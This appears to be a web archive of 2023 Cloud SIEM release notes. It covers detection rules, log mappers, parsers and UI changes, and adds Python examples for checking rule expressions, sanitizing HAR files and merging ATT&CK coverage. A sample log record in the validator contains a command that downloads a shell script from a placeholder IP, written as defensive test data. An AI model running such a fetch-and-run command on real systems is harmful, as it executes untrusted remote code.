
Minor changes and enhancements

  • [New] Continuing our work to better align the Cloud SIEM UI pages with Log Analytics UI pages to improve usability and provide a consistent user experience, the color palette has been adjusted slightly, some page decoration has been removed or altered, and some controls have been updated.
  • [New] On the Entity list page, you can now filter by reputation indicator (i.e. Malicious, Suspicious or NotFlagged).
  • [New] Users can now navigate directly from the Entity Activity panel on the HUD to the Entity List page, with the proper filter pre-applied.
  • [Updated] The Object Type attribute has been added back to the Signal summary section, next to the timestamp, so that it is visible whether the Signal details are expanded or collapsed.
  • [New] A user-editable Description field has been added to Rule Tuning Expressions.

Bug fixes

  • Sorting by value was not working properly on the Entities list page.
  • Sometimes, if the target value was left blank (default), domain normalization would append a colon to the resulting value.
  • Customers were experiencing rate limiting from VirusTotal after a change to the VirusTotal API, compounded by Cloud SIEM constantly retrying the resulting errors. This has been resolved, as has an issue with enrichments for file hashes.
  • Some Entities were not showing as being included in Entity Groups properly (even though attributes had been set correctly).
  • The MITRE ATT&CK® stage attribute was missing from some Signals in the audit logs.
  • Custom inventory sources were not included in the appropriate dropdown in Entity Group configuration.
  • On the Entity Details page, if the only Signals that existed were in Prototype mode, they would not be visible.
  • The reputation indicator on the Entity Details page was being rendered, then hidden.

This release includes new log mapping and parsing content for Druva Cyber Resilience:

Log Mappers

  • [New] Druva Cyber Resilience - Admin Logon
  • [New] Druva Cyber Resilience - Catch All

Parsers

  • [New] /Parsers/System/Druva/Druva Cyber Resilience

Bug Fixes

  • Recently, two rules, FIRST-S00052 and FIRST-S00049, were released to customers erroneously. Soon after, these rules started generating false positive Signals and Insights. We have removed those rules from all customer environments so they can be tuned properly and re-released after comprehensive testing. The process error that led to the release has been identified and corrected. Sumo Logic apologizes for the inadvertent Signals and Insights this error generated. If needed, please contact Support for assistance in closing the Insights.

This release includes new parsing and mapping support for C2C sources and mapping changes enumerated below.

Log Mappers

  • [New] Trellix mVision ePO Threats
  • [New] Zero Networks Segment Audit Activity
  • [New] Zero Networks Segment Network Activity
  • [Updated] AzureActivityLog 01
    • Remapped Application from properties.clientAppUsed to properties.appDisplayName for consistency

Parsers

  • [New] /Parsers/System/Trellix/Trellix MVision EPO
  • [New] /Parsers/System/Zero Networks/Zero Networks Segment

This release includes minor mapping adjustments to Duo and MS Graph Identity Protection Risk logs. Specific changes are enumerated below.

Log Mappers

  • [Updated] Duo Security Admin API - Audit
    • Added mappings for source host and source IP
  • [Updated] Duo Security Admin API - Authentication
    • Added mappings for source host and source IP
  • [Updated] Duo Security Admin API - Non-User Audit Changes
    • Added mappings for source host and source IP
  • [Updated] Duo Security Admin API - Targeted User Audit Changes
    • Added mappings for source host and source IP
  • [Updated] Microsoft Graph Identity Protection API C2C - riskDetections
    • Added principal as primary user_username key
  • [Updated] Microsoft Graph Identity Protection API C2C - riskyUsers
    • Added principal as primary user_username key

Tip: For all the up-to-date Cloud SIEM content, see the Cloud SIEM Content Catalog.

This content release includes updates to Cloud SIEM rules, new log mappers, new parsers, and the addition of normalization schema metadata. Specific updates are enumerated below. In addition, a number of rules were updated to include more accurate MITRE ATT&CK® tactic and technique tags.

Rules

  • [Updated] MATCH-S00213 AWS CloudTrail - Reconnaissance related event
    • Updated name expression to reduce insight false positivity
  • [Updated] MATCH-S00686 Base64 Decode in Command Line
  • [Updated] MATCH-S00373 BlueMashroom DLL Load
  • [Updated] FIRST-S00024 First Seen AWS SSM RunShellScript SendCommand From User
  • [Updated] FIRST-S00021 First Seen Azure Virtual Machine Run Command Issued by User
  • [Updated] FIRST-S00013 First Seen Driver Load - Global
  • [Updated] FIRST-S00014 First Seen Driver Load - Host
  • [Updated] FIRST-S00030 First Seen Outbound Connection to External IP Address on Port 445 from IP Address
  • [Updated] MATCH-S00705 Registry Modification - Authentication Package
  • [Updated] MATCH-S00707 Registry Modification - Winlogon Helper DLL
  • [Updated] MATCH-S00840 Suspicious Lambda Function - IAM Policy Attached
  • [Updated] MATCH-S00279 TAIDOOR RAT DLL Load
  • [Updated] MATCH-S00379 WMIExec VBS Script
  • [Updated] MATCH-S00570 WMIPRVSE Spawning Process
    • Corrected expression to exclude OS SID from user_userId; prior expression was incorrectly referencing SubjectLogonID
  • [Updated] MATCH-S00724 Windows Update Agent DLL Changed
  • [Updated] MATCH-S00435 XSL Script Processing

Log Mappers

  • [New] 1Password Item Audit Actions
  • [New] 1Password Item Usage Actions
  • [New] Zeek DNS Activity
  • [New] Zeek HTTP Activity
  • [New] Zeek conn Activity

Parsers

  • [New] /Parsers/System/1Password/1Password
  • [New] /Parsers/System/1PasswordC2C/1PasswordC2C
  • [New] /Parsers/System/Zeek/Zeek

Schema

  • [New] metadata_sourceBlockId
    • The _blockId of the original source log message (from Sumo Logic)

This is an archive of 2023 Cloud SIEM Release Notes. The current Cloud SIEM Release Notes are here.

To view the full archive, click here.


December 14, 2023 - Application Update

Minor changes and enhancements

  • [New] A new attribute section has been added to Signal and Insight details returned by the API endpoints GET /signals/{id} and GET /insights/{id}. The section will include the log search string (along with start and end times) that you can use to retrieve the queried records for a given Signal. The stanza looks like this:

    "recordSearchDetails": {
      "query": "{string}",
      "queryStartTime": "{timestamp}",
      "queryEndTime": "{timestamp}"
    },

Bug fixes

  • Some users were seeing duplicate schema tags (with an extra "s" at the end) in the UI.
  • In some scenarios, the UI would react slowly when users attempted to enter comments for Insights.
  • The UI was not properly enforcing the 100 character limit for rule names (and instead displaying an unknown error if the user attempted to set a rule name that was too long).

December 6, 2023 - Application Update

Automation Service Enhancements

The Automation Service has been updated to include several new enhancements:

  • Containment action types are now supported. Typically, these actions will perform some sort of response or remediation action, such as resetting a user's password or blocking a domain on your firewall. Many integrations in App Central now include containment actions.
  • User Choice nodes (and manual steps) are now supported. When a playbook is executing and a user choice node is encountered, execution pauses until a user selects an option. For example, after enrichment, a user could be asked whether to proceed with a containment action or to perform additional enrichment first. While a playbook is paused at a user choice node, its status will say Waiting user interaction.
  • In the initial release of the Automation Service, playbooks would not appear in the Create New Automation Cloud SIEM dialog unless they were defined as type CSE. This restriction has been lifted; all playbooks now appear in the dropdown.

For full details, see the Automation Service documentation.

Minor Changes and Enhancements

  • [New] Entity Groups now support second-level unnormalized attributes (fields.<attribute>.<attribute>).
  • [New] Log Mappings can now be enabled or disabled via API using the PUT /log-mappings/{id}/enabled endpoint.
  • [New] The Record Count field on Sumo Logic-provided Chain Rules can now be overridden (like other Rule fields).

Bug Fixes

  • Users were unable to manually change the Criticality assigned to an Entity.
  • Users were getting a 500 error when attempting to duplicate a rule.

Rule Expression Validation

When writing Rules and Rule Tuning Expressions, it is possible to write an expression that is syntactically correct (and passes validation) but still fails when executed. We have identified two specific cases:

  • Referencing a non-normalized field (fields.*) that does not exist in the log records (schema fields always exist)
  • Introducing a type mismatch (for example, comparing a string field to an integer literal)

If you test a Rule from the Rule Details page, an error is displayed in these cases, but the error message is not clear, and the normal editor validation does not catch these kinds of errors.

In addition, while the Cloud SIEM Rules engine does not generate runtime errors in these cases (the expression simply never matches), the Log Search engine does generate an error and refuses to return any results.

A few weeks ago, we changed the Signal and Insight detail pages for multi-Signal Rules (such as Chain Rules). Previously, a subset of records was attached to the details page and the user had to go to the Queried Records tab to view any other potentially related records; we combined those views and began showing both the attached and queried records on the main page. Unfortunately, with the new design, no records were displayed at all if the queried-record log search failed.

As a result of these issues, we have made two changes:

  • On the Rules Details page, if the test (a log search) returns an error, instead of saying "No Records Found," the screen will say, "Check the Rule/Tuning Expressions."
  • On the Signal and Insight Details pages, all attached record(s) will be displayed even if the log search query cannot be completed.

Note that fixing the rule expression(s) will not fix any Signals or Insights that have already been generated; you will have to use the View in Log Search feature and manually fix the log search string to see the log records.
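The following added example (not Cloud SIEM's validator and not its actual expression grammar) shows the kind of pre-flight check you can run on an expression before saving it: it extracts each field/literal comparison, flags schema fields compared against a literal of the wrong type, and flags fields.* references that resolve in none of a sample of records. The schema subset, the SQL-like comparison syntax and the sample records are assumptions made for this example.

```python
import re

# Assumed subset of the normalized schema with declared types. Schema fields always exist
# on a record; the names and types listed here are assumptions for this example.
SCHEMA = {
    "metadata_vendor": "string", "metadata_product": "string", "device_hostname": "string",
    "user_username": "string", "dstDevice_port": "number", "srcDevice_port": "number",
    "http_response_statusCode": "number",
}

# Constructed sample records. Unnormalized fields live under "fields" and may be absent.
SAMPLE_RECORDS = [
    {"metadata_vendor": "Microsoft", "metadata_product": "Windows", "device_hostname": "ws01",
     "user_username": "alice", "dstDevice_port": 445,
     "fields": {"EventData": {"CommandLine": "curl http://203.0.113.5/a.sh", "ParentImage": "cmd.exe"}}},
    {"metadata_vendor": "Microsoft", "metadata_product": "Windows", "device_hostname": "ws02",
     "user_username": "bob", "dstDevice_port": 443,
     "fields": {"EventData": {"CommandLine": "whoami"}}},
]

# One comparison, <field> <op> <literal>, in an assumed SQL-like syntax: identifiers may be
# dotted (fields.EventData.CommandLine), strings are single-quoted, numbers are bare.
_CMP = re.compile(r"(?P<field>[A-Za-z_][\w.]*)\s*(?P<op>=|!=|<>|>=|<=|>|<)\s*"
                  r"(?P<lit>'(?:[^']|'')*'|-?\d+(?:\.\d+)?)")


def _literal_type(lit):
    return "string" if lit.startswith("'") else "number"


def _record_has(record, dotted):
    """True if a dotted path such as fields.EventData.CommandLine resolves in the record."""
    cur = record
    for part in dotted.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return False
        cur = cur[part]
    return True


def check_expression(expr, sample_records, schema=SCHEMA):
    """Return a list of problems; an empty list means the expression passed the pre-check.

    Catches the two failure modes editor validation misses: a fields.* reference that no
    sample record carries, and a literal whose type disagrees with the schema field it is
    compared to. Any other unknown identifier is reported as well.
    """
    problems = []
    for m in _CMP.finditer(expr):
        field, lit = m.group("field"), m.group("lit")
        lit_type = _literal_type(lit)
        if field in schema:
            if schema[field] != lit_type:
                problems.append(f"type mismatch: {field} is {schema[field]} but literal {lit} is {lit_type}")
        elif field.startswith("fields."):
            if not any(_record_has(r, field) for r in sample_records):
                problems.append(f"missing field: {field} not present in any of {len(sample_records)} sample records")
        else:
            problems.append(f"unknown field: {field} is neither a schema field nor a fields.* reference")
    return problems


if __name__ == "__main__":
    for expr in ("metadata_vendor = 'Microsoft' AND dstDevice_port = 445 AND fields.EventData.CommandLine = 'whoami'",
                 "dstDevice_port = '445'",
                 "fields.EventData.Missing = 'x'"):
        print(expr, "->", check_expression(expr, SAMPLE_RECORDS) or "ok")
```

Run it against a few hundred recent records from the source the rule targets rather than two hand-made ones; a fields.* path that is present in some records and absent in others is fine for the Rules engine, so the check only complains when the path resolves nowhere.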

Other tips:

  • A malformed tuning expression will affect any rule that it is associated with, whether provided by Sumo Logic or custom-written.
  • We highly recommend using only schema fields in your rule and tuning expressions.
    • Sumo Logic's parsers and mappers are updated weekly, so please contact Support if you need to add a mapping from the raw log format to the normalized schema.
    • Sumo Logic's schema is extensible, so please contact Support if there's a field you'd like to add.

Bug Fixes

  • Links from the legend for the new Insights by Status panel on the HUD were not enabled properly.

November 13, 2023 - Content Release

This release includes the changes and enhancements enumerated below:

Rules

  • [New] MATCH-S00894 HAR file creation observed on host
    • HAR files contain session telemetry and network traffic. These files are typically generated using the "developer tools" options of modern browsers such as Chrome, Edge, or Firefox. They may contain sensitive data such as session keys, tokens, or cookies, which a threat actor can extract in order to access the systems those keys, tokens, or cookies grant access to. Ensure that this operation is expected, and sanitize the HAR file of any sensitive credential material.
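As an added illustration of the sanitization step the rule description recommends (example code written for this page, not a Sumo Logic rule or tool), the script below redacts the header, cookie, query-string and body locations of a HAR 1.2 capture where session material usually lands, and reports anything it left behind. The sample capture and the sensitive header/parameter name lists are constructed assumptions; extend the lists for your own applications.

```python
import json
import re
from copy import deepcopy
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

REDACTED = "REDACTED"
# Header and parameter names that commonly carry session material (matched case-insensitively).
# Assumption: these lists are a starting point, not a complete inventory for every app.
SENSITIVE_HEADERS = {"authorization", "proxy-authorization", "cookie", "set-cookie", "x-api-key"}
SENSITIVE_PARAMS = {"access_token", "id_token", "refresh_token", "token", "code", "session", "sessionid", "api_key"}
_BEARER = re.compile(r"(?i)\bbearer\s+[A-Za-z0-9\-._~+/]+=*")  # token68 shape from RFC 6750

# Constructed sample HAR (HAR 1.2 layout, one entry) carrying a bearer token in a header and
# a JSON body, a session cookie in both directions, and an access token in the query string.
SAMPLE_HAR = {"log": {"version": "1.2", "entries": [{
    "request": {
        "method": "GET",
        "url": "https://app.example.com/api/me?access_token=abc123&v=2",
        "headers": [{"name": "Authorization", "value": "Bearer eyJabc.def.ghi"},
                    {"name": "Cookie", "value": "session=s3cr3t"}],
        "queryString": [{"name": "access_token", "value": "abc123"}, {"name": "v", "value": "2"}],
        "cookies": [{"name": "session", "value": "s3cr3t"}],
    },
    "response": {
        "status": 200,
        "headers": [{"name": "Set-Cookie", "value": "session=n3w; HttpOnly"}],
        "cookies": [{"name": "session", "value": "n3w"}],
        "content": {"mimeType": "application/json", "text": '{"token":"Bearer eyJabc.def.ghi"}'},
    },
}]}}


def _scrub_pairs(pairs, names):
    for p in pairs or []:
        if p.get("name", "").lower() in names:
            p["value"] = REDACTED

def _scrub_cookies(cookies):
    for c in cookies or []:
        c["value"] = REDACTED

def _scrub_url(url):
    parts = urlsplit(url)
    if not parts.query:
        return url
    query = [(k, REDACTED if k.lower() in SENSITIVE_PARAMS else v)
             for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return urlunsplit(parts._replace(query=urlencode(query)))

def _scrub_body(content):
    text = content.get("text")
    if isinstance(text, str):
        content["text"] = _BEARER.sub(f"Bearer {REDACTED}", text)

def sanitize_har(har):
    """Return a deep copy of the HAR with credential material replaced by REDACTED."""
    out = deepcopy(har)
    for entry in out.get("log", {}).get("entries", []):
        req, resp = entry.get("request", {}), entry.get("response", {})
        if "url" in req:
            req["url"] = _scrub_url(req["url"])
        _scrub_pairs(req.get("headers"), SENSITIVE_HEADERS)
        _scrub_pairs(resp.get("headers"), SENSITIVE_HEADERS)
        _scrub_pairs(req.get("queryString"), SENSITIVE_PARAMS)
        _scrub_cookies(req.get("cookies"))
        _scrub_cookies(resp.get("cookies"))
        if "postData" in req:
            _scrub_pairs(req["postData"].get("params"), SENSITIVE_PARAMS)
            _scrub_body(req["postData"])
        if "content" in resp:
            _scrub_body(resp["content"])
    return out

def find_secrets(har):
    """List (entry index, location, name) for sensitive values that are still unredacted."""
    hits = []
    for i, entry in enumerate(har.get("log", {}).get("entries", [])):
        req, resp = entry.get("request", {}), entry.get("response", {})
        checks = [("request.headers", req.get("headers"), SENSITIVE_HEADERS),
                  ("response.headers", resp.get("headers"), SENSITIVE_HEADERS),
                  ("request.queryString", req.get("queryString"), SENSITIVE_PARAMS)]
        for loc, pairs, names in checks:
            for p in pairs or []:
                if p.get("name", "").lower() in names and p.get("value") != REDACTED:
                    hits.append((i, loc, p["name"]))
        for loc, cookies in (("request.cookies", req.get("cookies")), ("response.cookies", resp.get("cookies"))):
            for c in cookies or []:
                if c.get("value") != REDACTED:
                    hits.append((i, loc, c.get("name")))
    return hits


if __name__ == "__main__":
    clean = sanitize_har(SAMPLE_HAR)
    print("left behind:", find_secrets(clean))
    print(json.dumps(clean, indent=1))
```

The body scrub only strips bearer-shaped tokens; a capture of an application that returns credentials in other shapes (JSON session objects, SAML assertions) needs an application-specific pass, and the redacted file should still be treated as sensitive until it has been reviewed by hand.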

Log Mappers

  • [Updated] Microsoft Office 365 Exchange Mailbox Audit Events
    • Maps client field to resource.

Parsers

  • [Updated] /Parsers/System/Microsoft/Office 365
    • Enhanced user agent parsing.
  • [Updated] /Parsers/System/Microsoft/Windows-JSON-Open Telemetry
    • Adds support for a forthcoming format change and fixes an event ID formulation issue that was breaking mapping.

November 2, 2023 - Content Release

This content release includes new out-of-the-box parsing and mapping support for Claroty xDome in CEF. Additionally, parser templates were updated to remove extraneous commenting in uncommented parser templates.

Log Mappers

  • [New] (Claroty xDome) Alert
  • [New] (Claroty xDome) Communications Events
  • [New] (Claroty xDome) Vulnerability

Parsers

  • [New] /Parsers/System/Claroty/Claroty xDome CEF
  • [Updated] /Parsers/System/Parser Templates/CEF Template Commented
  • [Updated] /Parsers/System/Parser Templates/JSON Template
  • [Updated] /Parsers/System/Parser Templates/Key Value Pair Template
  • [Updated] /Parsers/System/Parser Templates/Unstructured Template Commented
  • [Updated] /Parsers/System/Parser Templates/Windows XML Template
  • [Updated] /Parsers/System/Parser Templates/XML Template

November 1, 2023 - Application Update

Multi-Record Signal Changes

To improve the usability of the Signals user interface, we've changed the way that records are displayed on Signals generated by multi-record (Threshold, Chain, and Aggregation) Rules. Instead of attaching a sample set of records to the Signal and then providing a Queried Record tab to manually search for additional records, all records that were part of the Signal will be displayed in the UI. (As a result, the Queried Records tab has been removed from the UI.)

Behind the scenes, we will attach the first record directly to the Signal (in the API and sec_signal index, this is listed in the allRecords section). In the UI, the other records will be gathered via an automatic background log search. (In the API and shortly in the sec_signal index, any involved Entities - up to a maximum of 100 - will be included in a new involvedEntities section.)

In addition, the number of attached records has been removed from the Signals list view, since it will now always be 1.

This change will also bring an enhancement for Outlier Rule Signals. Previously those Signals would only show a single record, but with this change they will also show all related records as well.

This change has no effect on the Rules themselves; they will continue to operate as before.

Automation Service Audit Logging

The Automation Service has been updated to include support for Audit Logging. Events like updates to integrations and playbook execution will now be automatically logged to the standard Sumo Logic Audit Logging indices.

For full details, see the Cloud SOAR documentation (the Automation Service will log a subset of those events).

Bug Fixes

  • In some cases, Insights would appear to be open after they had been closed/resolved.

October 26, 2023 - Content Release

This content release includes templates for creating Cloud SIEM parsers. There are two versions of each, one with comments that explain the purpose of each parser component, and “clean” versions that you can use to start quickly creating custom parsers. Further documentation on using these parsers will be available on Sumo Logic Docs in the coming weeks. Other changes in this release are enumerated below.

Rules

  • [New] FIRST-S00047 First Seen ASN Associated with User for a Successful Azure AD Sign In Event
    • This rule triggers when a new ASN value is associated with a successful Entra ID sign-in event for a particular username since the baseline period. A user's IP address may change periodically, but users typically authenticate from a small set of ASNs (one for their home network, another for their mobile device), so a sign-in from an ASN not seen since the baseline period could indicate credential theft. Look at other events for the user in the same time period to ascertain whether the access was malicious or benign.
  • [New] FIRST-S00048 First Seen Azure Device Code Authentication from User
    • Azure Device Code authentication can be utilized in phishing attacks. This specific rule looks for a user performing device code authentication to an Azure resource for the first time since the baseline period. If this action is not expected, it could be a sign of malicious activity. Examine the event for odd user agent values and look at what other actions the affected account is performing within the Azure estate.
  • [Updated] MATCH-S00891 Azure OAUTH Application Consent from User
    • Fixed mismatched description and summary fields
  • [Updated] MATCH-S00832 Office 365 Inbox Rule Updated
    • Added fix to exclude blank or null rules

Parsers

  • [New] /Parsers/System/Parser Templates/CEF Template
  • [New] /Parsers/System/Parser Templates/CEF Template Commented
  • [New] /Parsers/System/Parser Templates/CSV Template
  • [New] /Parsers/System/Parser Templates/CSV Template Commented
  • [New] /Parsers/System/Parser Templates/JSON Template
  • [New] /Parsers/System/Parser Templates/JSON Template Commented
  • [New] /Parsers/System/Parser Templates/Key Value Pair Template
  • [New] /Parsers/System/Parser Templates/Key Value Pair Template Commented
  • [New] /Parsers/System/Parser Templates/LEEF Template
  • [New] /Parsers/System/Parser Templates/LEEF Template Commented
  • [New] /Parsers/System/Parser Templates/Unstructured Template
  • [New] /Parsers/System/Parser Templates/Unstructured Template Commented
  • [New] /Parsers/System/Parser Templates/Windows XML Template
  • [New] /Parsers/System/Parser Templates/Windows XML Template Commented
  • [New] /Parsers/System/Parser Templates/XML Template
  • [New] /Parsers/System/Parser Templates/XML Template Commented

October 26, 2023 - Application Update

Enhanced Support for Custom Insight Statuses

Sumo Logic is pleased to announce two enhancements to Cloud SIEM related to custom Insight statuses.

First, the In Progress status can now be disabled (not deleted). Many customers create multiple statuses that all represent an "In Progress" state, so this option can help reduce confusion in those cases.

Second, while Cloud SIEM has long supported custom Insight statuses, Insights in any custom status have been reported together (as one group on the HUD or using the same color in other instances). To improve this experience, custom statuses can now be assigned a unique color:

Custom Insight Status Color Palette

This color will be used wherever an Insight is displayed with that status (such as in the Insight list and board views). For existing custom statuses, the color will remain white (as it has been) until the configuration is changed.

The HUD has been updated as well; for example, the Insights by Status widget has been updated to properly display each status instead of grouping custom statuses together:

Updated HUD Widget for Custom Insight Statuses

A corresponding attribute (color) has also been added to the custom status API.

Minor Changes and Enhancements

  • [New] Searches in Cloud SIEM (from the top menu bar) are now case-insensitive.
  • [New] Custom match list columns now support unnormalized attributes (like fields.foo)
  • [New] The records search page in Cloud SIEM now includes a link to view the equivalent search in the Log Analytics Platform log search page.
  • [Updated] When a comment is added to an Insight by an Action from the Automation Service, it will be attributed to a system user called "Automation Service".

Bug Fixes

  • The Insight data forwarded to the Automation Service did not include the full set of attributes for attached Signals.
  • Some hostnames in CrowdStrike FDR inventory sources were not getting normalized properly.
  • Entity Groups were being applied to the wrong Entity types.
  • Duplicate audit log entries for Insights were being created. (Note that while this has been resolved, the duplicate entries have not been removed from customer audit logs.)
  • When closing an Insight, users can enter comments and the UI suggests content based on comment history. These suggestions were broken and have been reset.
  • When configuring Entity Groups, the UI was not allowing users to specify unnormalized inventory attributes (like fields.foo).

October 18, 2023 - Application Update

Legacy Signal Forwarding Deprecation

Since July 2022, Signals generated by Cloud SIEM are automatically saved in a standardized sec_signal index. This special partition is similar to the existing sec_record indices in that, unlike data retained using the legacy Signal Forwarding feature, it is stored in a format that supports keyword search, nested attributes, and other standard log search features.

The new index is automatically generated and retained for a period of 2 years at no additional cost for all Cloud SIEM customers.

As a result, the optional legacy Signal Forwarding feature in Cloud SIEM will be deprecated on November 15, 2023. Existing data will not be deleted, but new Signals generated after that date will no longer be forwarded using that feature and the option will no longer be available. (Signals will continue to be forwarded automatically to sec_signal.) Customers leveraging data forwarded using the legacy feature to generate dashboards (or for other use cases) will need to modify those applications to use the new sec_signal index before then. Note that the content of the sec_signal index is not identical to the content in data forwarded using the legacy option.

For more information about this change, and the differences between the two data sets, refer to our 2023 Cloud SIEM Signal Index Migration FAQ.


October 11, 2023 - Content Release

This content release contains rules mostly pertaining to Microsoft Azure OAUTH Application Registration, NSG, and Key Vault services. Pertinent to CVE-2023-38545 and CVE-2023-38546, this release also includes a new rule (FIRST-S00040 described below) to aid in detecting unusual cURL tool usage by a user as it may pertain to exploitation of these vulnerabilities.

Rules

  • [New] MATCH-S00891 Azure OAUTH Application Consent from User
    • A user has consented to application permissions.
  • [New] CHAIN-S00017 Change of Azure MFA Method followed by Risky SignIn
    • This alert looks for an Azure MFA authentication method change, followed by a risky sign in detected by Azure within a six hour time period for the same user account.
  • [New] FIRST-S00044 First Seen AppID Generating MailItemsAccessed Event from User
    • This alert looks for a first seen application ID accessing an Office 365/Exchange mailbox item. The MailItemsAccessed event is not always enabled within an Entra/Azure/Office 365 tenant, as it depends on Microsoft licensing. See the following guide from CISA for additional information on this event type and investigation steps: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-193a.
  • [New] FIRST-S00046 First Seen Client Generating MailItemsAccessed Event from User
    • This alert looks for a first seen client accessing an Office 365/Exchange mailbox item. The MailItemsAccessed event is not always enabled within an Entra/Azure/Office 365 tenant, as it depends on Microsoft licensing. See the following guide from CISA for additional information on this event type and investigation steps: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-193a.
  • [New] FIRST-S00040 First Seen cURL execution from User
    • First Seen execution of cURL by a user from a device. The cURL tool is designed to retrieve files using various internet protocols in a programmatic manner; it is often abused by threat actors to download files as part of a broader attack chain. If this usage of cURL comes from an unexpected user, review the command line value and investigate the URL that was passed to the cURL command.
  • [New] MATCH-S00888 Microsoft Teams External Access Enabled
    • Microsoft Teams External Access has been enabled; this setting allows any users that are external to your Teams/Office organization to message users that are within your Teams/Office organization. If this setting change is unplanned or unexpected it is recommended that this activity be reviewed. Microsoft Teams provides administrators the ability to allow only specific external domains to message users within the organization. Look for Office 365 events with the MessageSent or MemberAdded event names in order to gain more detail as to what users were invited to which Teams channels, if any.
  • [New] MATCH-S00889 Microsoft Teams Guest Access Enabled
    • Microsoft Teams Guest Access has been enabled globally; this setting allows any users that are external to your Teams/Office organization to be invited into your Teams/Office organization. If this setting change is unplanned or unexpected it is recommended that this activity be reviewed. Microsoft Teams provides administrators the ability to allow only specific guest actions to take place within the Teams/Office organization.
  • [New] MATCH-S00890 Owner Added to Azure Service Principal
    • An owner was added to an Azure service principal. Threat actors may add owners to Azure service principals as a privilege escalation or persistence avenue. Ensure this action is expected and approved.
  • [New] MATCH-S00893 Secret Added to Azure Service Principal
    • Secrets can be added to Azure Service Principals as a persistence mechanism. The properties.targetResources.1.modifiedProperties.1.newValue field will have details regarding the secret or certificate added.
  • [New] MATCH-S00892 Value Added to Azure NSG Group
    • This alert looks for a value being added to an Azure Network Security Group (NSG) successfully. Depending on the environment, other Azure services such as Azure Firewall may provide egress and ingress controls. Ensure this activity is authorized and expected. The raw data for the event contains the exact values being modified.

October 2, 2023 - Application Update

MITRE ATT&CK® Threat Coverage Explorer

We are excited to announce a new feature in Cloud SIEM, the MITRE ATT&CK® Threat Coverage Explorer. This interactive tool gives you the ability to see how Rules, Signals, and log sources map to adversary actions using the MITRE ATT&CK® Matrix for Enterprise.

MITRE ATT&CK® Threat Coverage Explorer

The MITRE Explorer can be used to identify gaps in coverage and understand the impact of specific log sources and Rules to the overall threat coverage and value of Cloud SIEM.

The tool can be accessed in the Content Menu. It supports three different views:

  • Recent Activity - Your environment's actual coverage (Rules that generated Signals) over the past six months
  • All Community Activity - All Cloud SIEM customers' anonymized and aggregated coverage over the past six months.
  • Theoretical Coverage - Potential coverage if all rules are enabled and all log sources are connected.

The MITRE Explorer uses the built-in MITRE tactic, technique, and sub-technique tags to track coverage, so if custom Rules are tagged appropriately, they will also be included.

Clicking on a technique will open a detailed view which describes the technique (and any included sub-techniques) and lists the Rules and Signals that match.

The view is filterable by tactic, technique, and sub-technique, as well as log source and coverage level. There are multiple view options so the display can be customized, and the data can be exported in MITRE's JSON format so it can be combined with data from other tools to view your total coverage. There is also an API to retrieve coverage data and the JSON content.
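As an added example of combining the exported coverage with data from another tool (this code is not the Explorer's export format or its API; the rule-to-technique pairings, the second tool's detections and the layer version strings are constructed assumptions), the script below merges two coverage maps, emits an ATT&CK Navigator layer whose per-technique score is the number of detections covering it, and lists gaps against a set of techniques you care about.

```python
import json
from collections import defaultdict

# Constructed coverage maps: technique ID -> detections covering it. The rule names are taken
# from this page; their pairing with these technique IDs is an assumption for the example.
SIEM_COVERAGE = {
    "T1059.003": ["MATCH-S00686 Base64 Decode in Command Line"],
    "T1547.002": ["MATCH-S00705 Registry Modification - Authentication Package"],
    "T1547.004": ["MATCH-S00707 Registry Modification - Winlogon Helper DLL"],
    "T1105": ["FIRST-S00040 First Seen cURL execution from User"],
}
EDR_COVERAGE = {  # a second, hypothetical tool's detections
    "T1059.003": ["edr-encoded-command"],
    "T1003.001": ["edr-lsass-access"],
}


def merge_coverage(*sources):
    """Union of technique -> detections over (source name, coverage map) pairs."""
    merged = defaultdict(list)
    for name, coverage in sources:
        for tid, detections in coverage.items():
            merged[tid].extend(f"{name}: {d}" for d in detections)
    return dict(merged)


def to_navigator_layer(coverage, name="Combined detection coverage", attack_version="14"):
    """Build an ATT&CK Navigator layer; score = number of detections covering the technique.

    The version strings are assumptions; pin them to the Navigator release you import into.
    """
    techniques = [
        {"techniqueID": tid, "score": len(dets), "comment": "; ".join(dets), "enabled": True}
        for tid, dets in sorted(coverage.items())
    ]
    top = max((t["score"] for t in techniques), default=0)
    return {
        "name": name,
        "versions": {"attack": attack_version, "navigator": "4.9.1", "layer": "4.5"},
        "domain": "enterprise-attack",
        "description": "Merged coverage; score is the number of detections per technique",
        "techniques": techniques,
        "gradient": {"colors": ["#ffffff", "#66b1ff"], "minValue": 0, "maxValue": top},
    }


def coverage_gaps(coverage, wanted):
    """Techniques in `wanted` that no merged source covers (IDs are matched exactly)."""
    return sorted(t for t in wanted if t not in coverage)


if __name__ == "__main__":
    merged = merge_coverage(("cloud-siem", SIEM_COVERAGE), ("edr", EDR_COVERAGE))
    print(json.dumps(to_navigator_layer(merged), indent=2))
    print("gaps:", coverage_gaps(merged, ["T1105", "T1566.001", "T1003.001"]))
```

A score that counts detections is a blunt measure: two rules that both fire only on one log source still leave the technique uncovered if that source is not connected, so pair this with the Explorer's per-log-source view before treating a technique as done.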

For more details on how to use the MITRE Explorer, check out the online documentation.

Minor Changes and Enhancements

  • [New] When viewing Insight details, users can now select multiple Signals and remove them from the Insight with a single click.
  • [New] When viewing Entity inventory data, unnormalized fields with millisecond-based timestamps are now automatically converted to human-readable format when possible.
  • [New] Tag schemas and context actions can now be managed via Terraform. See the API documentation for details.

Bug Fixes

  • The ability to add items to a Match List via Terraform was not working properly.
  • Timestamps on the Entity Timeline were using different time zones.
  • A UI error was preventing users from overriding some fields on First Seen and Outlier Rules.

September 22, 2023 - Content Release

This content release includes new parsing, mapping, and passthrough rule support for Qualys Vulnerability Data as well as changes enumerated below.

Rules

  • [New] MATCH-S00887 Port Forwarding Enabled via Visual Studio Code
    • A local port has been forwarded and made available for external connectivity utilizing the Visual Studio Code port forwarding feature

Log Mappers

  • [New] Qualys Vulnerability Data
  • [Updated] Windows - Security - 4886
    • Adds alternate fields for user_username and device_hostname
  • [Updated] Windows - Security - 4887
    • Adds alternate fields for user_username and device_hostname

Parsers

  • [New] /Parsers/System/Qualys/Qualys Vulnerability Data

September 21, 2023 - Application Update

Entity Groups Inventory Enhancements

We are happy to announce some important enhancements to the Entity Group feature in Cloud SIEM.

With this release, Entity Groups can now use any attribute available in your inventory data - including non-normalized attributes. (Previously, only the group attribute was available.) Non-normalized attributes can be used by adding the fields. prefix.

